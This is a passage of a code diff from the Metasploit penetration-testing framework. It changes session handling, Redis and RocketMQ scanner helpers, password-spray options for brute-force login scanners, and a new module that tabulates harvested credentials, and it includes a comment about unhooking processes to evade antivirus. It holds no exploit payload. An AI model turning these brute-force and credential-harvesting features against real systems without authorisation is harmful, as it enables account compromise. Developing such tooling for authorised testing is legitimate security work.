+    framework.events.on_session_interact(self)
+    framework.history_manager.with_context(name: type.to_sym) do
+      _interact_stream
+    end
+  end
+
+  ##
+  # :category: Msf::Session::Interactive implementors
+  #
+  def _interact_stream
+    framework.events.on_session_interact(self)
+
+    console.framework = framework
+    # Call the console interaction of the ldap client and
+    # pass it a block that returns whether or not we should still be
+    # interacting.  This will allow the shell to abort if interaction is
+    # canceled.
+    console.interact { interacting != true }
+    console.framework = nil
+
+    # If the stop flag has been set, then that means the user exited.  Raise
+    # the EOFError so we can drop this handle like a bad habit.
+    raise EOFError if (console.stopped? == true)
+  end
+
+end

lib/msf/base/sessions/meterpreter.rb

@@ -175,7 +175,11 @@ class Meterpreter < Rex::Post::Meterpreter::Client
     end
 
     session.commands.concat(session.core.get_loaded_extension_commands('core'))
-
+    if session.tlv_enc_key[:weak_key?]
+      print_warning("Meterpreter session #{session.sid} is using a weak encryption key.")
+      print_warning('Meterpreter start up operations have been aborted. Use the session at your own risk.')
+      return nil
+    end
     # Unhook the process prior to loading stdapi to reduce logging/inspection by any AV/PSP
     if datastore['AutoUnhookProcess'] == true
       console.run_single('load unhook')
@@ -421,7 +425,11 @@ class Meterpreter < Rex::Post::Meterpreter::Client
 
   def update_session_info
     # sys.config.getuid, and fs.dir.getwd cache their results, so update them
-    fs&.dir&.getwd
+    begin
+      fs&.dir&.getwd
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog('failed retrieving working directory', error: e)
+    end
     username = self.sys.config.getuid
     sysinfo  = self.sys.config.sysinfo
 

lib/msf/base/sessions/mssql.rb

@@ -8,6 +8,8 @@ class Msf::Sessions::MSSQL < Msf::Sessions::Sql
 
   def initialize(rstream, opts = {})
     @client = opts.fetch(:client)
+    self.platform = opts.fetch(:platform)
+    self.arch = opts.fetch(:arch)
     self.console = ::Rex::Post::MSSQL::Ui::Console.new(self, opts)
 
     super(rstream, opts)

lib/msf/base/sessions/postgresql.rb

@@ -9,6 +9,8 @@ class Msf::Sessions::PostgreSQL < Msf::Sessions::Sql
   # @param opts [Msf::Db::PostgresPR::Connection] :client
   def initialize(rstream, opts = {})
     @client = opts.fetch(:client)
+    self.platform = opts.fetch(:platform)
+    self.arch = opts.fetch(:arch)
     @console = ::Rex::Post::PostgreSQL::Ui::Console.new(self)
     super(rstream, opts)
   end

lib/msf/base/simple/module.rb

@@ -18,10 +18,14 @@ module Module
   def _import_extra_options(opts)
     # If options were supplied, import them into the payload's
     # datastore
-    if (opts['Options'])
-      self.datastore.import_options_from_hash(opts['Options'])
-    elsif (opts['OptionStr'])
-      self.datastore.import_options_from_s(opts['OptionStr'])
+    if (value = opts['Options'])
+      if value.is_a?(String)
+        self.datastore.import_options_from_s(value)
+      else
+        self.datastore.import_options_from_hash(value)
+      end
+    elsif (value = opts['OptionStr'])
+      self.datastore.import_options_from_s(value)
     end
   end
 

lib/msf/core/auxiliary/auth_brute.rb

@@ -9,6 +9,8 @@ module Msf
 
 module Auxiliary::AuthBrute
 
+  include Msf::Auxiliary::LoginScanner
+
   def initialize(info = {})
     super
 
@@ -61,6 +63,7 @@ module Auxiliary::AuthBrute
       user_file: datastore['USER_FILE'],
       userpass_file: datastore['USERPASS_FILE'],
       user_as_pass: datastore['USER_AS_PASS'],
+      password_spray: datastore['PASSWORD_SPRAY']
     }.merge(opts))
 
     if framework.db.active

lib/msf/core/auxiliary/login_scanner.rb

@@ -0,0 +1,31 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Auxiliary
+    ###
+    #
+    # This module provides a base configure scanner method for binding common datastore options to the login scanners
+    #
+    ###
+    module LoginScanner
+      #
+      # Converts datastore options into configuration parameters for the
+      # Msf::Auxiliary::LoginScanner. Any parameters passed into
+      # this method will override the defaults.
+      #
+      def configure_login_scanner(conf)
+        {
+          host: datastore['RHOST'],
+          port: datastore['RPORT'],
+          proxies: datastore['Proxies'],
+          stop_on_success: datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+          framework: framework,
+          framework_module: self,
+          local_port: datastore['CPORT'],
+          local_host: datastore['CHOST'],
+        }.merge(conf)
+      end
+    end
+  end
+end

lib/msf/core/auxiliary/redis.rb

@@ -10,12 +10,9 @@ module Msf
     include Auxiliary::Scanner
     include Auxiliary::Report
 
-    REDIS_UNAUTHORIZED_RESPONSE = /(?<auth_response>ERR operation not permitted|NOAUTH Authentication required)/i
-
     #
     # Initializes an instance of an auxiliary module that interacts with Redis
     #
-
     def initialize(info = {})
       super
       register_options(
@@ -52,12 +49,14 @@ module Msf
         vprint_error("No response to '#{command_string}'")
         return
       end
-      if match = command_response.match(REDIS_UNAUTHORIZED_RESPONSE)
+      if (match = authentication_required?(command_response))
         auth_response = match[:auth_response]
+
         fail_with(::Msf::Module::Failure::BadConfig, "#{peer} requires authentication but Password unset") unless datastore['Password']
         vprint_status("Requires authentication (#{printable_redis_response(auth_response, false)})")
+
         if (auth_response = send_redis_command('AUTH', datastore['PASSWORD']))
-          unless auth_response =~ /\+OK/
+          unless auth_response =~ Rex::Proto::Redis::Base::Constants::OKAY
             vprint_error("Authentication failure: #{printable_redis_response(auth_response)}")
             return
           end
@@ -87,6 +86,13 @@ module Msf
 
     private
 
+    # Verifies whether the response indicates if authentication is required
+    # @return [RESPParser] Returns a matched response if a hit is there; otherwise nil.
+    def authentication_required?(response)
+      response.match(Rex::Proto::Redis::Base::Constants::AUTHENTICATION_REQUIRED) ||
+        response.match(Rex::Proto::Redis::Version6::Constants::AUTHENTICATION_REQUIRED)
+    end
+
     def redis_proto(command_parts)
       return if command_parts.blank?
       command = "*#{command_parts.length}\r\n"

lib/msf/core/auxiliary/report_summary.rb

@@ -0,0 +1,147 @@
+# -*- coding: binary -*-
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# https://metasploit.com/framework/
+##
+
+module Msf
+  class Auxiliary
+    ###
+    #
+    # This module provides a means to report module summaries
+    #
+    ###
+    module ReportSummary
+      def initialize(info = {})
+        super(info)
+
+        if framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS)
+          register_options(
+            [
+              OptBool.new('ShowSuccessfulLogins', [false, 'Outputs a table of successful logins', true]),
+            ]
+          )
+        end
+      end
+
+      def run
+        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins']
+
+        @report = {}
+        @report.extend(::Rex::Ref)
+        rhost_walker = Msf::RhostsWalker.new(datastore['RHOSTS'], datastore).to_enum
+        conditional_verbose_output(rhost_walker.count)
+        result = super
+        print_report_summary
+        result
+      end
+
+      # Creates a credential and adds to to the DB if one is present
+      #
+      # @param [Hash] credential_data
+      # @return [Metasploit::Credential::Login]
+      def create_credential_login(credential_data)
+        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins']
+
+        credential = {
+          public: credential_data[:username],
+          private_data: credential_data[:private_data]
+        }
+        @report[rhost] = { successful_logins: [] }
+        @report[rhost][:successful_logins] << credential
+        super
+      end
+
+      # Framework is notified that we have a new session opened
+      #
+      # @param [MetasploitModule] obj
+      # @param [Object] info
+      # @param [Hash] ds_merge
+      # @param [FalseClass] crlf
+      # @param [Socket] sock
+      # @param [Msf::Sessions::<SESSION_CLASS>] sess
+      # @return [Msf::Sessions::<SESSION_CLASS>]
+      def start_session(obj, info, ds_merge, crlf = false, sock = nil, sess = nil)
+        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins']
+
+        result = super
+        @report[rhost].merge!({ successful_sessions: [] })
+        @report[rhost][:successful_sessions] << result
+        result
+      end
+
+      private
+
+      # Prints a summary of successful logins
+      # Returns a ::Rex::Text::Table with the following data: host, public and private credentials for each
+      # successful login per host
+      #
+      # @return [Hash] Rhost keys mapped to successful logins and sessions for each host
+      def print_report_summary
+        report = @report
+
+        logins = report.flat_map { |_k, v| v[:successful_logins] }.compact
+        sessions = report.flat_map { |_k, v| v[:successful_sessions] }.compact
+
+        print_status("Scan completed, #{logins.size} #{logins.size == 1 ? 'credential was' : 'credentials were'} successful.")
+        print_successful_logins(report)
+
+        if datastore['CreateSession']
+          print_status("#{sessions.size} #{sessions.size == 1 ? 'session was' : 'sessions were'} opened successfully.")
+        end
+
+        report
+      end
+
+      # Logic to detect if the ShowSuccessLogins datastore option has been set
+      #
+      # @param [Hash] report Host mapped to successful logins and sessions
+      # @return [String] Rex::Text::Table containing successful logins
+      def print_successful_logins(report)
+        if datastore['ShowSuccessfulLogins'] == true && !report.empty?
+          table = successful_logins_to_table(report)
+          print_line("\n" + table.to_s + "\n")
+        end
+      end
+
+      # The idea here is to add a hybrid approach for scanner modules
+      # If only one host is scanned a more verbose output is useful to the user
+      # If scanning multiple hosts we would want more lightweight information
+      #
+      # @param [Object] host_count The number of hosts
+      def conditional_verbose_output(host_count)
+        if host_count == 1
+          datastore['Verbose'] = true
+        end
+      end
+
+      # Takes the login/session results and converts them into a Rex::Text::Table format
+      #
+      # @param report [Hash{String => [Metasploit::Framework::LoginScanner::Result, Msf::Sessions]}]
+      # @return [Rex::Text::WrappedTable] Rex::Text::Table containing successful logins
+      def successful_logins_to_table(report)
+        field_headers = %w[Host Public Private]
+
+        markdown_fields = report.flat_map do |host, result|
+          if result[:successful_logins].nil?
+            next
+          end
+
+          result[:successful_logins].map do |credential|
+            [host, credential[:public], credential[:private_data]]
+          end
+        end
+
+        ::Rex::Text::Table.new(
+          'Header' => 'Successful logins',
+          'Indent' => 4,
+          'Columns' => field_headers,
+          'Rows' => markdown_fields.compact
+        )
+      end
+    end
+  end
+end

lib/msf/core/auxiliary/rocketmq.rb

@@ -25,10 +25,14 @@ module Msf
       begin
         connect
         sock.send(header + data_length + data, 0)
-        res = sock.recv(1024)
+        res_length = sock.timed_read(4)&.unpack1('N')
+        return nil if res_length.nil?
+
+        res = sock.timed_read(res_length)
       rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
         print_error("Unable to connect: #{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+        elog('Error sending the rocketmq version request', error: e)
+        return nil
       ensure
         disconnect
       end
@@ -64,7 +68,11 @@ module Msf
     # @return [Hash] Hash including RocketMQ versions info and Broker info if found
     def parse_rocketmq_data(res)
       # remove a response header so we have json-ish data
-      res = res[8..]
+      res = res.split(/\x00_/)[1]
+      unless res.starts_with?("{")
+        print_error("Failed to successfully remove the response header and now cannot parse the response.")
+        return nil
+      end
 
       # we have 2 json objects appended to each other, so we now need to split that out and make it usable
       res = res.split('}{')
@@ -111,14 +119,21 @@ module Msf
       # Example of brokerData:
       # [{"brokerAddrs"=>{"0"=>"172.16.199.135:10911"}, "brokerName"=>"DESKTOP-8ATHH6O", "cluster"=>"DefaultCluster"}]
 
+      if broker_datas['brokerDatas'].blank?
+        print_status("brokerDatas field is missing from the response, assuming default broker port of #{default_broker_port}")
+        return default_broker_port
+      end
       broker_datas['brokerDatas'].each do |broker_data|
+        if broker_data['brokerAddrs'].blank?
+          print_status("brokerAddrs field is missing from the response, assuming default broker port of #{default_broker_port}")
+          return default_broker_port
+        end
         broker_data['brokerAddrs'].values.each do |broker_endpoint|
           next unless broker_endpoint.start_with?("#{rhost}:")
           return broker_endpoint.match(/\A#{rhost}:(\d+)\z/)[1].to_i
         end
       end
 
-
       print_status("autodetection failed, assuming default port of #{default_broker_port}")
       default_broker_port
     end